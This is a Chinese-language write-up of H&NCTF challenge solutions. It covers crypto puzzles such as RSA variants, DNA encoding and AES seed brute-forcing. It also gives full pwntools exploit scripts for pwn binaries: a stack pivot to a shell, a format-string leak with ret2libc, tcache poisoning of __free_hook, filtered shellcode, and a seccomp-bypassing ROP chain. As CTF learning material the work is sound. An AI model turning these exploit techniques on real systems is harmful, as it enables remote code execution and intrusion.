周日的比赛,赛后拿别人的WP又作了俩,最后一个题也是没弄懂,先记一下吧。
Crypto
EZmath
一个简单的函数题。在sagemath里有个two_squares函数,可以从平方和恢复两个规模相近的数。这种比较适合于RSA里的p,q。另外未知的e用来猜,一点意思都没有。
from Crypto.Util.number import *
flag = b'Kicky_Mu{KFC_v_me_50!!!}'
p = getPrime(256)
q = getPrime(256)
n = p*q^3
e = # what is usually used ?
N = pow(p, 2) + pow(q, 2)
m = bytes_to_long(flag)
c = pow(m,e,n)print(c)
print(N)c = 34992437145329058006346797890363070594973075282993832268508442432592383794878795192132088668900695623924153165395583430068203662437982480669703879475321408183026259569199414707773374072930515794134567251046302713509056391105776219609788157691337060835717732824405538669820477381441348146561989805141829340641
N = 14131431108308143454435007577716000559419205062698618708133959457011972529354493686093109431184291126255192573090925119389094648901918393503865225710648658
e = 65537
p,q = two_squares(N)
m = pow(c, inverse(e,(p-1)*(q-1)),p*q)
long_to_bytes(int(m))
#b'H&NCTF{D0_Y0u_know_Complex_n3mbers?hahaha}'
f = (? * ?)
给了3个文件,一个cipher.txt猜是密文(这也不用猜)另外两个都有400多行,猜是p,q的位,显然可以很容易区分0,1。然后再猜个e。为什么总让猜e?
from Crypto.Util.number import *
from base64 import *c = bytes_to_long(b64decode('ve9MPTSrRrq89z+I5EMXZg1uBvHoFWBGuzxhSpIwu9XMxE4H2f2O3l+VBt4wR+MmPJlS9axvH9dCn1KqFUgOIzf4gbMq0MPtRRp+PvfUZWGrJLpxcTjsdml2SS5+My4NIY/VbvqgeH2qVA=='))p = int(''.join(['1' if i[0]=='3' else '0' for i in open('file1.txt','r').read().split('\n') ]),2)
q = int(''.join(['1' if i[0]=='6' else '0' for i in open('file2.txt','r').read().split('\n') ]),2)
print(isPrime(p))
m = pow(c, inverse(65537,(p-1)*(q-1)),p*q)
print(long_to_bytes(m))
#H&NCTF{Y0u_s@cce3d3d_in_finding_the_meaning_0f_these_d0cuments}
*ez_Classic
比赛中没作出来,全是中文的乱码,记得作过想不起来了,后来想起来是base65536,解完是另一种乱码。
后来知道是base2048,好在都有在线网站。说起来这个东西python库还会报错。
后边是DNA加密,不过在线网站也不大灵了。需要处理一下。其实还不如自己处理,DNA就是4进制的BASE64变表,3个一组。
c ="GAC & GCT CTA GTC CTT { CTA AGT AAA CAG CAG AGA AAG & AGT _ AAG CAC CGA ATT CAT TTC _ AGT CAG _ CAG TTC _ AGA ATC CAT TCG CAC ACA CAG CAT @ ATC ACG }"dic = 'ACGT'
d = ''
for i in c.split():if len(i)==3:v = dic.index(i[0])*16 + dic.index(i[1])*4 + dic.index(i[2])if v<26:d += chr(0x61 + v)elif v<52:d += chr(0x41 + v-26)else:d += chr(0x30 + v-52)else:d += i print(d)
#H&NCTF{Classic&l_crypt9_ls_s9_int2rest@ng}
MatrixRSA
矩阵的RSA,这个没见过,搜了下,得到一个论文。https://www.gcsu.edu/sites/files/page-assets/node-808/attachments/pangia.pdf
里边请到phi的生成。
然后就当是普通的RSA作就行了。n很小一切问题都解决了。
from Crypto.Util.number import *
import osflag = b"H&NCTF{??????????????}" + os.urandom(73)p = getPrime(56)
q = getPrime(56)
n = p * qpart = [bytes_to_long(flag[13*i:13*(i+1)]) for i in range(9)]M = Matrix(Zmod(n),[[part[3*i+j] for j in range(3)] for i in range(3)
])e = 65537
C = M ** e
print(f"n = {n}")
print(f"C = {list(C)}")
n = 3923490775575970082729688460890203
C = [(1419745904325460721019899475870191, 2134514837568225691829001907289833, 3332081654357483038861367332497335), (3254631729141395759002362491926143, 3250208857960841513899196820302274, 1434051158630647158098636495711534), (2819200914668344580736577444355697, 2521674659019518795372093086263363, 2850623959410175705367927817534010)]#https://www.gcsu.edu/sites/files/page-assets/node-808/attachments/pangia.pdf
p,q = 56891773340056609,68964114585148667
phi = (p^2-1)*(p^2-p)*(q^2-1)*(q^2-q)
d = inverse(e,phi)M = matrix(Zmod(n), C)
m = M^d flag = b''
for i in range(3):for j in range(3):flag+= long_to_bytes(int(m[i,j]))#H&NCTF{58bff5c1-4d5f-4010-a84c-8fbe0c0f50e8}
BabyAES
就是爆破一个种子。对于4字节整形来说多大都可以整。关键是这题有提示,就是压缩包有文件的时期,这大概就没多大范围了。不过这里又有个问题,就是压缩包里的文件时间比密文生成时间早。它怎么压进去的呢?
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from secret import flag
import time
import randomflag = pad(flag,16)
assert b"H&NCTF" in flagseed = int(time.time())
random.seed(seed)
key = random.randbytes(16)
iv = random.randbytes(16)
aes = AES.new(key,AES.MODE_CBC,iv)
cipher = aes.encrypt(flag)print(f"cipher = {cipher}")cipher = b'\x96H_hz\xe7)\x0c\x15\x91c\x9bt\xa4\xe5\xacwch\x92e\xd1\x0c\x9f\x8fH\x05\x9f\x1d\x92\x81\xcc\xe0\x98\x8b\xda\x89\xcf\x92\x01a\xe1B\xfb\x97\xdc\x0cG'
import random
from Crypto.Cipher import AESdef decrypt(seed):random.seed(seed)key = random.randbytes(16)iv = random.randbytes(16)aes = AES.new(key,AES.MODE_CBC,iv)flag = aes.decrypt(cipher)if b'CTF' in flag or b'flag' in flag:print(seed, flag)#time.mktime((2020,8,21,7,57,0,0,0,0)) 压缩包文件时间2020/08/21/7/57
seed0 = 1597967820
for i in range(10000):decrypt(seed0+i)#b'H&NCTF{b1c11bd5-2bfc-404e-a795-a08a002aeb87}\x04\x04\x04\x04'
BabyPQ
这是个签到,给了n,phin求p,突然卡了一下,phin是啥!一般写成phi.把这俩p,q粘上去就OK了。
from z3 import *
s = Solver()
p,q = Ints('p q')
s.add(p*q == n)
s.add((p-1)*(q-1) == phin)
s.check()s.model()
[p = 12370845391995175823157683147097330251170029016368566631878046736457097428499577053796506306362132716974919832972869704679166006275456266374842381146018047,q = 11499958845050907949092531453369314187038648586725679612623212725700789220246787356177904738256529698491399380706600388366483468308822299193842842035815201]
还有一个3解题,两个0解题不会。估计也就不会了。因为拿到WP,那个3解题看不懂。
PWN
close
这个程序不用写的。代码里关了1,只要重定向到0上就OK
└─$ nc hnctf.imxbt.cn 29879
exec 1>&0
ls
bin
dev
easypwn
flag
lib
lib32
lib64
libexec
libx32
cat flag
H-NCTF{ca2cb422-3035-4827-b1e8-2acf3b43ea27}
ez_pwn
32位能溢出到ebp ,输入两次。
int vul()
{char s[40]; // [esp+0h] [ebp-2Ch] BYREFmemset(s, 0, 0x20u);read(0, s, 0x30u);printf("Hello, %s\n", s);read(0, s, 0x30u);return printf("Hello, %s\n", s);
}
第1次填充到ebp带出,第2次覆盖ebp移栈。
from pwn import *context(arch='i386', log_level='debug')'''
0xffffcf94│+0x0000: 0x00000000 ← $esp
0xffffcf98│+0x0004: 0xffffcfa0 → 0x00000a41 ("A\n"?)
0xffffcf9c│+0x0008: 0x00000030 ("0"?)
0xffffcfa0│+0x000c: 0x00000a41 ("A\n"?)
0xffffcfa4│+0x0010: 0x00000000
0xffffcfa8│+0x0014: 0x00000000
0xffffcfac│+0x0018: 0x00000000
0xffffcfb0│+0x001c: 0x00000000
0xffffcfb4│+0x0020: 0x00000000
0xffffcfb8│+0x0024: 0x00000000
0xffffcfbc│+0x0028: 0x00000000
0xffffcfc0│+0x002c: 0x08048670 → <__libc_csu_init+0> push ebp
0xffffcfc4│+0x0030: 0xf7ffcb80 → 0x00000000
0xffffcfc8│+0x0034: 0x0804a000 → 0x08049f0c → 0x00000001
0xffffcfcc│+0x0038: 0xffffcfd8 → 0x00000000 ← $ebp
0xffffcfd0│+0x003c: 0x08048661 → <main+40> mov eax, 0x0
0xffffcfd4│+0x0040: 0xf7e1cff4 → 0x0021cd8c
0xffffcfd8│+0x0044: 0x00000000
0xffffcfdc│+0x0048: 0xf7c23295 → <__libc_start_call_main+117> add esp, 0x10
0xffffcfe0│+0x004c: 0x00000001
'''elf = ELF('./pwn1')
#p = process('./pwn1')
p = remote('hnctf.imxbt.cn', 36897)#gdb.attach(p, "b*0x8048637\nc")
p.sendafter(b'?\n', b'A'*0x2c)
p.recvuntil(b'A'*0x2c)
stack = u32(p.recv(4)) - 0x38p.sendafter(b'\n', flat(elf.plt['system'],0,stack+0xc, b'/bin/sh\x00').ljust(0x2c,b'\x00')+p32(stack-4))p.interactive()
idea
负数绕过和短的格式化字符串
int vuln()
{int v1; // [esp+8h] [ebp-30h]char nptr[32]; // [esp+Ch] [ebp-2Ch] BYREFunsigned int v3; // [esp+2Ch] [ebp-Ch]v3 = __readgsdword(0x14u);printf("How many bytes do you want me to read? ");get_n((int)nptr, 4u);v1 = atoi(nptr);if ( v1 > 32 )return printf("No! That size (%d) is too large!\n", v1);// 负数绕过puts("Ok, sounds good. I'll give u a gift!");gift(); // 格式化字符串6字节printf("Give me %u bytes of data!\n", v1);getchar();get_n((int)nptr, v1);return printf("What you said is: %s\n", nptr);
}
from pwn import *context(arch='i386', log_level='debug')elf = ELF('./idea')
#libc = ELF('/home/kali/glibc/libs/2.23-0ubuntu11.3_i386/libc-2.23.so')
libc = ELF('/home/kali/glibc/libs/my/libc6-i386_2.23-0ubuntu11.3_amd64.so')#p = process('./idea')
p = remote('hnctf.imxbt.cn', 45299)#1
p.sendlineafter(b"How many bytes do you want me to read? ", b'-1')#leak canary
p.sendlineafter(b"Ok, sounds good. I'll give u a gift!\n",b'%23$p')
canary = int(p.recvuntil(b"Give me", drop=True),16)
print(f"{canary= :x}")p.sendlineafter(b"bytes of data!\n", b'A'*0x20+flat(canary,0,0,0,elf.sym['_start']))#2
p.sendlineafter(b"How many bytes do you want me to read? ", b'-1')#gdb.attach(p, "b*0x804870b\nc")
#leak libc
p.sendlineafter(b"Ok, sounds good. I'll give u a gift!\n",b'%31$p')
libc.address = int(p.recvuntil(b"Give me", drop=True),16) - 0x18647
print(f"{libc.address = :x}")
bin_sh = next(libc.search(b'/bin/sh\0')) #libc.address + 0x15910bp.sendlineafter(b"bytes of data!\n", b'A'*0x20+flat(canary,0,0,0,elf.sym['_start']))#3 stack
p.sendlineafter(b"How many bytes do you want me to read? ", b'-1')#leak canary
#gdb.attach(p, "b*0x804870b\nc")
p.sendlineafter(b"Ok, sounds good. I'll give u a gift!\n",b'%10$p')
stack = int(p.recvuntil(b"Give me", drop=True),16) - 0x2c
print(f"{stack = :x}")
#gdb.attach(p, "b*0x804870b\nc")
#p.sendlineafter(b"bytes of data!\n", b'A'*0x20+flat(canary,0,0,0,elf.plt['puts'],0,elf.got['printf']))
p.sendlineafter(b"bytes of data!\n", b'/bin/sh'.ljust(0x20, b'\x00')+flat(canary,0,0,0,libc.sym['system'],0,bin_sh))p.interactive()'''
0xffffcf60│+0x0000: 0x08048800 → <__libc_csu_init+0> push ebp ← $esp
0xffffcf64│+0x0004: "%8$p"
0xffffcf68│+0x0008: 0xffffcf00 → 0x00000000
0xffffcf6c│+0x000c: 0xf945c100
0xffffcf70│+0x0010: 0x080488e4 → "Ok, sounds good. I'll give u a gift!" #4
0xffffcf74│+0x0014: 0x00000004
0xffffcf78│+0x0018: 0xffffcfb8 → 0xffffcfc8 → 0x00000000 ← $ebp #ebp
0xffffcf7c│+0x001c: 0x08048781 → <vuln+116> sub esp, 0x8 #ret
0xffffcf80│+0x0020: 0xffffcfb8 → 0xffffcfc8 → 0x00000000
0xffffcf84│+0x0024: 0xf7fdb8d0 → <_dl_runtime_resolve+16> pop edx
0xffffcf88│+0x0028: 0xffffffff
0xffffcf8c│+0x002c: 0xf700312d ("-1"?) #nptr
0xffffcf90│+0x0030: 0x08048800 → <__libc_csu_init+0> push ebp
0xffffcf94│+0x0034: 0xf7ffcb80 → 0x00000000
0xffffcf98│+0x0038: 0xffffcfb8 → 0xffffcfc8 → 0x00000000
0xffffcf9c│+0x003c: 0x080486b2 → <init+59> add esp, 0x10
0xffffcfa0│+0x0040: 0x08048880 → "Welcome to H&NCTF~!"
0xffffcfa4│+0x0044: 0x00000000
0xffffcfa8│+0x0048: 0x00000001
0xffffcfac│+0x004c: 0xf945c100 #canary
0xffffcfb0│+0x0050: 0xffffcff0 → 0xf7e1cff4 → 0x0021cd8c
0xffffcfb4│+0x0054: 0xf7fc1728 → 0xf7ffdbac → 0xf7fc1840 → 0xf7ffda40 → 0x00000000
0xffffcfb8│+0x0058: 0xffffcfc8 → 0x00000000
0xffffcfbc│+0x005c: 0x080487ee → <main+27> add esp, 0x4 #main_ret
0xffffcfc0│+0x0060: 0x00000001
0xffffcfc4│+0x0064: 0xffffcfe0 → 0x00000001
0xffffcfc8│+0x0068: 0x00000000
0xffffcfcc│+0x006c: 0xf7c23295 → <__libc_start_call_main+117> add esp, 0x10'''
what
这也不是个难题,之所以答的人少是因为卡在flag和后台的不一样,然后提供了3种壳,都不是。后来提示改了。官方手抖,在头上输入了个\
libc-2.27 是个最受欢迎的版本。漏洞最好打了,还有UAF。先free 8块得到libc然后tcache attack向free_hook写system再free带/bin/sh的块。
唯一的卡点是个计数。可以忽略。
from pwn import *context(arch='amd64', log_level='debug')
libc = ELF('./libc-2.27.so')cmd = "Enter your command:\n"
def add(size):p.sendlineafter(cmd, b'1')p.sendlineafter(b"size:\n", str(size).encode())def free():p.sendlineafter(cmd, b'2')def show(idx):p.sendlineafter(cmd, b'3')p.sendafter(b"please enter idx:\n", str(idx).encode())p.recvuntil(b"Content:")def edit(idx, msg):p.sendlineafter(cmd, b'4')p.sendafter(b"please enter idx:\n", str(idx).encode())p.sendafter(b"Please enter your content:\n", msg)#p = process('./what')
p = remote('hnctf.imxbt.cn', 21554)for i in range(8):add(0x100)for i in range(8):free()show(0)
libc.address = u64(p.recv(6).ljust(8,b'\x00')) - 0x70 - libc.sym['__malloc_hook']
print(f"{libc.address = :x}")for i in range(2):add(0x20)free()
edit(1, p64(libc.sym['__free_hook']))
add(0x20)
add(0x20) #2 free_hook
edit(2, flat(libc.sym['system']))
add(0x10)
edit(3, b'/bin/sh\x00')
#gdb.attach(p)
#pause()free()
p.sendline(b'cat flag')
p.interactive()
#H&NCTF{ef997eaf-df1d-4aed-af33-f57b8afbe678}
beauty
代码很难看。这也是这题唯一的卡点。
一开始让输入名字,这里有个指针前溢出,可以向前写到可写的got表
int sub_156E()
{puts("Please input your idx:");__isoc99_scanf(&aD, &dword_4164);puts("Please input your name:");byte_4158[dword_4164] = read(0, byte_40E0, 0x78uLL);return printf(&aS, byte_40E0);
}
后边有4个菜单,只有一个有用。这里调用了atoi,通过前边的溢出将未初始化的got表里的atoi改成printf,这样就得到一个格式化字符串漏洞,而且在栈里。这就好办了。
另外一个干扰项就是菜单3有个溢出,可以修改stack_chk_fail在这里造溢出覆盖canary,但由于有检查到不了这。
from pwn import *context(arch='amd64', log_level='error')
libc = ELF('./libc.so.6')
elf = ELF('./pwn1')#p = process('./pwn1')
p = remote('hnctf.imxbt.cn', 46327)#4158[4164]=len
#4060 got.atoi xxx60->printf xxx70
p.sendlineafter(b"Please input your idx:", str(-0xf8).encode())
p.sendafter(b"Please input your name:", b'\x00'*0x70)def go_printf(pay):p.sendlineafter(b'\x99\xe5\xa5\xb3\n', b'4')p.recvuntil(b"Would you choose me if you had to do it all over again?\n")p.sendline(str(0x79).encode())p.sendline(str(0x165).encode())p.sendline(str(0x173).encode())p.send(pay.ljust(0x20, b'\x00'))#gdb.attach(p, "b*0x555555555361\nc")go_printf(b'%11$p,%43$p,%30$p,%13$p,')
p.recvuntil(b'0x')
canary = int(p.recvuntil(b',', drop=True),16)
libc.address = int(p.recvuntil(b',', drop=True),16) - 0x80 - libc.sym['__libc_start_main']
stack = int(p.recvuntil(b',', drop=True),16) - 0x110
elf.address = int(p.recvuntil(b',', drop=True),16) - 0x18b2
print(f"{canary = :x} {libc.address =:x} {stack = :x} {elf.address =:x}")pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
rop = flat(pop_rdi+1, pop_rdi, next(libc.search(b'/bin/sh\0')), libc.sym['system'])for i,v in enumerate(rop):if v == 0:pay = b"%9$hhn".ljust(0x18,b'.') + p64(stack+i)else:pay = f"%{v}c%9$hhn".encode().ljust(0x18,b'.') + p64(stack+i)go_printf(pay)#jmp_2_return
context.log_level = 'debug'
pay = b'....%9$n'.ljust(0x18,b'.') + p64(elf.address + 0x4160)
go_printf(pay)
p.sendline(b'cat flag')p.interactive()
*hide_flag_
这题赛后问师傅,说打call。
是个shellcode题,难点在于检查一定要偶奇偶奇。syscall 0f05就用不上了,好在有call rax,call rcx。
然后原理就简单了,只是作起来麻烦。在没看WP的情况下自己终于弄出来了。再看WP发再方法不很聪明。
1,利用栈残留的数据通过加减行在rax造个open/getdents64/write然后是重来造个open/pread64/write
2,运行完一个call后最后的地址会在rcx里
3,偶数和可数的填充用nop,gs,我用的cmp就是长点,好在容易理解,还有个cdq这会破坏rdx,如果在rdx不用的情况下可行。因为不清楚gs是干什么的,不敢用,类似的cmc,cld还有好多都不敢用。
4,shl rax,7;xchg rax,rcx;sub rax,rcx 也是一种造指针的方法
from pwn import *context(arch='amd64', log_level='debug')
libc = ELF('./libc.so.6')#p = process('./pwn1')
p = remote('hnctf.imxbt.cn', 43649)'''
pay = ''
#rax + 0xea750
pay += 'pop rax;pop rcx;pop rax;pop rcx; pop rax; pop rcx;' #rax = 0x00007ffff7c29d90
pay += 'add rax,0x010ea76e; sub rax,0x01000100; add rax,0x71; add rax,0x73; ' #rax + 0xf4d10
pay += 'sub al,0x1; sub al,0x1;' #rax = open
pay += 'push 0x2f; push rsp; pop rdi; ' #rdi->.
pay += 'xor rsi,rsi; cmp eax,0x33323130; push rdx; ' #rsi = 0
#open(buf,0)
pay += 'call rax;' #call rax#getdents64(int fd, void dirp[.count], size_t count)
pay += 'push rcx; push rax; pop rdi; ' #rdi=3
#rax = rcx - 0x2df0b
pay += 'pop rax; cmp eax,0x33323130; sub rax,0x0102df0a; add rax,0x01000100; sub rax, 0x71;sub rax, 0x71; sub al,0x1f;'
pay += 'push rax;push rbp;pop rsi;cdq;'
pay += 'push 0x3; pop rax;cdq; shl rax,9; push rax; cdq; pop rdx; cmp eax,0x33323130; push rdx;' #rdx = 0x600
pay += 'xchg rax,r14; cmp eax,0x33323130; add ax, 0x0302; push rax; cmp eax,0x33323130; pop rsi;pop rbx;'
pay += 'pop rax; call rax; cmp eax,0x33323130; '#write
pay += 'push 0x1; nop; pop rdi;' #rdi=1
#rax = rcx+0x2e229
pay += 'xchg rax,rcx; add rax,0x0102e328; sub rax,0x01000100; add al,0x1;'
pay += 'nop; call rax;'
'''#F1@g520
#open()
pay = ''
#rax + 0xea750
# 58 59 58 59 58 59
pay += 'pop rax;pop rcx;pop rax;pop rcx; pop rax; pop rcx;' #rax = 0x00007ffff7c29d90
# 4805 6ea70e01 482d 00010001 4883c071 4883c073
pay += 'add rax,0x010ea76e; sub rax,0x01000100; add rax,0x71; add rax,0x73; ' #rax + 0xf4d10
# 2c01 2c01 50 xx
pay += 'sub al,0x1; sub al,0x1; push rax;cmp eax,0x33323130;' #rax = open
# 48b9 4631 4067 3633 3001 6a01 58 3d 3031 3233 48c1e02d 48c1e003 4891 4829c8 xx
pay += 'mov rcx,0x0130333667403146; push 0x1;pop rax;cmp eax,0x33323130;shl rax,53;shl rax,3;xchg rax,rcx; sub rax,rcx;cmp eax,0x33323130;'
# 4891 6a01 58 3d 3031 3233 48c1e025 48c1e003 4891 4829c8
pay += 'xchg rax,rcx; push 0x1;pop rax;cmp eax,0x33323130;shl rax,37;shl rax,3;xchg rax,rcx; sub rax,rcx;cmp eax,0x33323130; '
pay += 'xchg rax,rcx; push 0x1;pop rax;cmp eax,0x33323130;shl rax,29;shl rax,3;xchg rax,rcx; sub rax,rcx;cmp eax,0x33323130; '
# 56 59 50 54 5f 4889f0 51
pay += 'pop rsi;pop rcx;push rax; cmp eax,0x33323130; push rsp; pop rdi; mov rax,rsi; push rcx;' #rdi->F1@g520\0
# 4831f6
pay += 'xor rsi,rsi;' #rsi = 0
# ffd0 open(buf,0)
pay += 'call rax;' #call rax#pread rax = rcx - 0x1e0b
# 51 58 51 662d001f 4883c059
pay += 'push rcx;pop rax;push rcx; sub ax, 0x1f00;add rax,89;add rax,89; add rax,67;' #rax=pread64
# 6a03 90 5f 6a71 5a 53 90 59 90
pay += 'push 3; nop; pop rdi;push 0x71;pop rdx;push rbx; nop; pop rcx; nop;' #rdi=3, rdx=0x71
# ffd0 open(buf,0)
pay += 'call rax;' #call rax#write rax = rcx+0x2126
# 51 58 51 662d2621
pay += 'push rcx;pop rax;push rcx; add ax, 0x2126;' #rax=pread64
# 6a01 90 5f 90
pay += 'push 1;nop;pop rdi;nop;'
# ffd0 open(buf,0)
pay += 'call rax;' #call rax#gdb.attach(p, "b*0x5555555554a4\nc")
p.sendafter(b"Please find flag's name\n", asm(pay))p.interactive()
#H-NCTF{H1D3F1@g_d3e9fa6f-5baf-4af6-8c2e-2b7650cd55fa}
*Rand_file_
这个也说不成复现,基本就是拿着WP抄的。因为中间重要的一段不明白。只能照葫芦画。
__int64 __fastcall main(int a1, char **a2, char **a3)
{char v4; // [rsp+Bh] [rbp-25h]int i; // [rsp+Ch] [rbp-24h]__int64 ptr; // [rsp+10h] [rbp-20h] BYREF__int64 v7; // [rsp+18h] [rbp-18h]__int64 v8; // [rsp+20h] [rbp-10h]unsigned __int64 v9; // [rsp+28h] [rbp-8h]v9 = __readfsqword(0x28u);setvbuf(stdout, 0LL, 1, 0LL);set_rule();while ( 1 ){write(1, "11? >\n", 6uLL);v7 = read_long();write(1, "77! >\n", 6uLL);v8 = read_long();if ( !v7 && !v8 )break;sub_1400(&ptr + v7, &ptr + v8);}ptr ^= __readfsqword(0x28u);for ( i = 0; i <= 3; ++i ) // ptr逆序{v4 = *((_BYTE *)&ptr + i);*((_BYTE *)&ptr + i) = *((_BYTE *)&ptr + 7LL - i);*((_BYTE *)&ptr + 7LL - i) = v4;}fwrite(&ptr, 1uLL, 8uLL, stdout);fflush(stdout);write(1, "\n", 1uLL);return 0LL;
}
代码就这么一点,先是允许两丙格互换,然后是把ptr的值与canary(特制的无0且对称)异或后反转输出。
目标就是构造个pop_rdi,xxx,gets。
看WP是通过写IO结构,因为不大明白就略了。
泄露这块很容易,拿偏移互换后就能输出,然后把libc_start_main_ret换回到start就能重入。
造gets,pop_rdi这块略,在栈里找个尾号为a或2的位置,把gets的值改造一下写,再与IO_2_1_stdout_+0x28的值换换就换到栈里了,原理不明白。
然后在栈里构造个pop_rdi,栈里可写地址(WP里叫bss不是实际在栈里),gets读入。再把这些rop换到当前的返回地址。再重入
读入的ROP移到返回地址这执行。由于seccomp有限制这里用openat绕过open,用close(2)关掉错误输出把文件打开到2,然后读目录得到文件名。再用相同方法读文件即可。
from pwn import *context(arch='amd64', log_level='error')
libc = ELF('./libc.so.6')
elf = ELF('./pwn1')stack_ptr = 0
off = 0xe0
canary = 0
misal = 0
lastm = 0def swap(idx1,idx2):p.sendlineafter(b'11? >\n', str(idx1).encode())p.sendlineafter(b'77! >\n', str(idx2).encode()) def stop():global stack_ptrswap(0,0)stack_ptr -= off def leak(idx, idx2=0):swap(5,12) #swap 5,12 return to startswap(idx, idx2) stop() return canary^u64(p.recv(8)[::-1])def change(addr):addr = ((addr>>8)&0xff)|((addr&0xff)<<8)addr^= canary&0xffff addr = 0x10000 - addr print(f"{-addr = :x}")return -addr #find an address where last 4bit is 2/10 in stack from *environ
def get_misal():global lastmfor i in range(0x40):a = leak((stack_environ - stack_ptr)//8 + lastm + i)if a&0xf == 2 or a&0xf == 0xa:leak((heap - stack_ptr)//8,0)leak((heap - stack_ptr)//8, (stack_environ - stack_ptr)//8 )if i>0:lastm += i+1return aelse:print('Error')exit()#p = process('./run')
p = remote('hnctf.imxbt.cn', 20458)canary = leak(4)
libc.address = leak(12) - 243 - libc.sym['__libc_start_main']
stack_ptr = leak(7) - 0x118 - off
stack_environ = leak((libc.sym['environ'] - stack_ptr)//8)
heap = leak((libc.sym['obstack_exit_failure']-0x28 - stack_ptr)//8) + 0x2620 #mp_.heap_base chunk_411.fd
print(f"{canary = :x} {libc.address = :x} {stack_ptr = :x} {stack_environ = :x} {heap = :x}")stdout_write_ptr = libc.sym['_IO_2_1_stdout_'] + 0x28
fun_gets = libc.sym['gets'] # 0x7ffff7e38970
pop_rdi = libc.address + 0x00000000000820ac # 0x7ffff7e370ac pop rdi ; ret
pop_rsi = libc.address + 0x000000000002601f # pop rsi ; ret
pop_rdx = libc.address + 0x0000000000119431 # pop rdx ; pop r12 ; ret
pop_rax = libc.address + 0x0000000000036174 # pop rax ; ret
syscall = libc.sym['getpid'] + 9 # syscall ret#write gadget to stack
misal = get_misal()
print(f"{misal = :x}")
swap(2, change(fun_gets))
swap(0, change(fun_gets))
swap((misal - 2 - stack_ptr + 8) // 8, 21)
swap((stack_environ - stack_ptr) // 8, (stdout_write_ptr - stack_ptr) // 8)
swap(5, 12)
stop()
off_gets = misal + 6
print(f"{off_gets = :x}")misal = get_misal()
print(f"{misal = :x}")
swap(2, change(pop_rdi))
swap(0, change(pop_rdi))
swap((misal - 2 - stack_ptr + 8) // 8, 21)
swap((stack_environ - stack_ptr) // 8, (stdout_write_ptr - stack_ptr) // 8)
swap(5, 12)
stop()
off_pop_rdi = misal + 6
print(f"{off_pop_rdi = :x}")bss = leak(13) #stack write payload
leak(0, (heap - stack_ptr)//8)
leak((stack_environ - stack_ptr)//8, (heap - stack_ptr)//8 )context.log_level = 'debug'
print(f"{off_gets = :x} {off_pop_rdi = :x} {stack_environ = :x} {bss = :x}")#ROP gets
swap(5, (off_pop_rdi - stack_ptr)//8)
swap(6, (stack_environ - stack_ptr)//8)
swap(7, (off_gets - stack_ptr)//8)
swap(8,12)
stop()#get_rop readdir
'''
paylen = 0xf0
pay = flat([pop_rdi,2, pop_rax,3, syscall, #close(2)pop_rdi,0, pop_rsi, bss+paylen, pop_rdx,0x10000,0, pop_rax,257, syscall, #openat(0,&'.',0x10000)pop_rdi,2, pop_rsi, bss+paylen, pop_rdx,0x1000,0, pop_rax,78, syscall, #getdents64(2,&'.', 0x400)pop_rdi,1, pop_rax,1, syscall, #write(1,&'.', 0x400)
])
print(f"{len(pay) = :x}")pay += b'/tmp\0'
'''
paylen = 0xf0
pay = flat([pop_rdi,2, pop_rax,3, syscall, #close(2)pop_rdi,0, pop_rsi, bss+paylen, pop_rdx,0,0, pop_rax,257, syscall, #openat(0,&'.',0x10000)pop_rdi,2, pop_rsi, bss+paylen, pop_rdx,0x50,0, pop_rax,0, syscall, #read(2,&'.', 0x400)pop_rdi,1, pop_rax,1, syscall, #write(1,&'.', 0x400)
])
print(f"{len(pay) = :x}")
pay += b'/tmp/flag_6f36aa6e9fe2a6c582bb4d43bca8563a\0'p.sendline(pay) #read payload->bss#gdb.attach(p, "b*0x5555555556e0\nc")stack_ptr += 0x20 #pop_rdi,bss,gets,start
for i in range(paylen//8):swap(5+i, (bss - stack_ptr)//8 +i)stop()p.interactive()
#H-NCTF{randfile_1b1f0634-7252-4534-a238-4e5a74042989}
'''
gef➤ tel 20
0x00007fffffffddd0│+0x0000: 0x00007ffff7fa62e8 ← $rsp
0x00007fffffffddd8│+0x0008: 0x00005555555556f0
0x00007fffffffdde0│+0x0010: 0x0000000000000000 <- ptr
0x00007fffffffdde8│+0x0018: 0x0000555555555200 1
0x00007fffffffddf0│+0x0020: 0x00007fffffffdef0 2
0x00007fffffffddf8│+0x0028: 0xef4e4b9a9a4b4eef 3 canary ABCDDCBA
0x00007fffffffde00│+0x0030: 0x0000000000000000 ← 4 $rbp
0x00007fffffffde08│+0x0038: 0x00007ffff7dd9083 → <__libc_start_main+243> mov edi, eax #5
0x00007fffffffde10│+0x0040: 0x00007ffff7ffc620 6
0x00007fffffffde18│+0x0048: 0x00007fffffffdef8 7
0x00007fffffffde20│+0x0050: 0x0000000100000000
0x00007fffffffde28│+0x0058: 0x000055555555553c → endbr64
0x00007fffffffde30│+0x0060: 0x00005555555556f0 → endbr64
0x00007fffffffde38│+0x0068: 0x6e0fbb38972b3d66
0x00007fffffffde40│+0x0070: 0x0000555555555200 #12 start
0x00007fffffffde48│+0x0078: 0x00007fffffffdef0 → 0x0000000000000001
0x00007fffffffde50│+0x0080: 0x0000000000000000
0x00007fffffffde58│+0x0088: 0x0000000000000000
0x00007fffffffde60│+0x0090: 0x91f044c72b0b3d66
0x00007fffffffde68│+0x0098: 0x91f05483b7453d66line CODE JT JF K
=================================0000: 0x20 0x00 0x00 0x00000004 A = arch0001: 0x15 0x00 0x0e 0xc000003e if (A != ARCH_X86_64) goto 00160002: 0x20 0x00 0x00 0x00000000 A = sys_number0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 00050004: 0x15 0x00 0x0b 0xffffffff if (A != 0xffffffff) goto 00160005: 0x15 0x02 0x00 0x00000002 if (A == open) goto 0008 openat0006: 0x15 0x01 0x00 0x00000028 if (A == sendfile) goto 00080007: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 00090008: 0x06 0x00 0x00 0x0005000d return ERRNO(13)0009: 0x15 0x00 0x05 0x00000000 if (A != read) goto 0015 close(2);open();read(2,);write()0010: 0x20 0x00 0x00 0x00000014 A = fd >> 32 # read(fd, buf, count)0011: 0x25 0x04 0x00 0x00000000 if (A > 0x0) goto 00160012: 0x15 0x00 0x02 0x00000000 if (A != 0x0) goto 00150013: 0x20 0x00 0x00 0x00000010 A = fd # read(fd, buf, count)0014: 0x25 0x01 0x00 0x00000002 if (A > 0x2) goto 00160015: 0x06 0x00 0x00 0x7fff0000 return ALLOW0016: 0x06 0x00 0x00 0x00000000 return KILL0x00007fffffffdf88│+0x0128: 0x00007fffffffe2c6 → 0x4300316e77702f2e ("./pwn1"?)
0x00007fffffffdf90│+0x0130: 0x0000000000000000
